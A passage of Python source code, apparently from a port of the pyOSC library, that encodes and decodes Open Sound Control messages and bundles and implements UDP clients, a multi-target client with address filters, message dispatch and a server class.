for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next).encode('latin1'))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
    The size is always a multiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if isinstance(next,str):
next = next.encode('latin1')
if isinstance(next,bytes):
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = b''
return binary
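# Worked examples of the zero-padding above (illustrative):
#   OSCString("hi")  -> b'hi\x00\x00'               (2 chars padded to 4 bytes)
#   OSCBlob(b"abc")  -> b'\x00\x00\x00\x04abc\x00'  (int32 size, then data padded to
#                                                    4 bytes; note this implementation
#                                                    stores the padded length as the size)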
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', int(secs), int(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
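# Illustrative arithmetic (example value assumed): for time = 1234567890.5,
# secs - NTP_epoch = 1234567890 + 2208988800 NTP seconds and the fractional part
# becomes int(0.5 * NTP_units_per_second) = 0x80000000; any time <= 0 is encoded as
# the special 'immediately' timetag struct.pack('>LL', 0, 1).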
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = data.find(b'\0')
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length].decode('latin1'), data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (int(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
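# Illustrative round trip (assumed values):
#   msg = OSCMessage("/test"); msg.append(1); msg.append("two")
#   decodeOSC(msg.getBinary())  ->  ['/test', ',is', 1, 'two']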
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
if isinstance(bytes,str):
bytes = bytes.encode('latin1')
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % bytes[i]
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if isinstance(port,int):
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (isinstance(url,str) and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
When the 'address' argument is given this client is connected to a specific remote server.
- address ((host, port) tuple): the address of the remote server to send all messages to
Otherwise it acts as a generic client:
If address == 'None', the client doesn't connect to a specific remote server,
and the remote address must be supplied when calling sendto()
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
if server == None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = None
else:
self.setServer(server)
self.client_address = None
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
if self.socket != None:
self.close()
self.socket = server.socket.dup()
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket != other.socket:
return False
if self.server and other.server:
return self.server == other.server
return True
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
return self.socket.getpeername()
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self.socket.connect(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except ValueError:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.connect(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except ValueError:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if isinstance(args,str):
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
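# Hedged example of parseFilterStr() (the addresses are illustrative):
#
#   parseFilterStr('/synth +/volume -/debug')
#   # -> ['/synth', {'/volume': True, '/debug': False}]
#
# The leading '/synth' becomes the prefix; '+' entries map to True (send),
# '-' entries map to False (don't send).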
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in list(filters.keys()):
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in list(filters.values()):
out = ["+/*"]
else:
out = ["-/*"]
for (addr, enabled) in list(filters.items()):
if addr == '/*':
continue
if enabled:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = str.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
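# Sketch of how getRegEx() is used for OSC address-pattern matching
# (the addresses are made-up examples):
#
#   expr = getRegEx('/osc/*/volume')
#   expr.match('/osc/1/volume')   # -> a match object ('*' matches any run of characters)
#   expr.match('/osc/1/pan')      # -> None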
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets', and sends each OSCMessage to each OSCTarget.
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in list(self.targets.keys()):
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in list(src.keys()): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, enabled) in list(src.items()):
if (addr in list(dst.keys())) and (dst[addr] != enabled):
del dst[addr]
else:
dst[addr] = enabled
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in list(self.targets.keys()):
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if isinstance(filters,str):
(_, filters) = parseFilterStr(filters)
elif not isinstance(filters,dict):
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
elif (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in list(self.targets.keys()):
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in list(self.targets.items()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in list(self.targets.keys())):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in list(dict.items()):
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in list(self.targets.items()):
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = list(out.values())
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in list(filters.keys()):
if filters['/*']:
out = msg
else:
out = None
elif False in list(filters.values()):
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in list(filters.keys()):
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = list(out.values())
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in list(self.targets.items()):
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, out)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except ValueError:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return list(self.callbacks.keys())
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the received message
- tags (string): The OSC-typetags of the received message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in list(self.callbacks.keys()):
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
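# Hedged sketch of registering and dispatching a handler with OSCAddressSpace
# (handler name, address and values are illustrative):
#
#   def volume_handler(addr, tags, data, client_address):
#       print("got", addr, data)
#
#   space = OSCAddressSpace()
#   space.addMsgHandler('/synth/volume', volume_handler)
#   space.dispatchMessage('/synth/volume', 'f', [0.8], ('127.0.0.1', 9000))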
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-addresses
that have been registered to the server with a callback-function.
If the address-pattern of the message matches the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.socket = self.socket.dup()
client.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, client.sndbuf_size)
client._fd = client.socket.fileno()
client.server = self
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
if self.client != None:
self.client.close()
self.client = client
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return self.socket == other.socket
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
